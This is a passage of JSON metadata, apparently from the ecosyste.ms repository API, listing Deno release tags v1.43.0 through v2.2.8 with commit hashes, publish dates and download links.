null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/a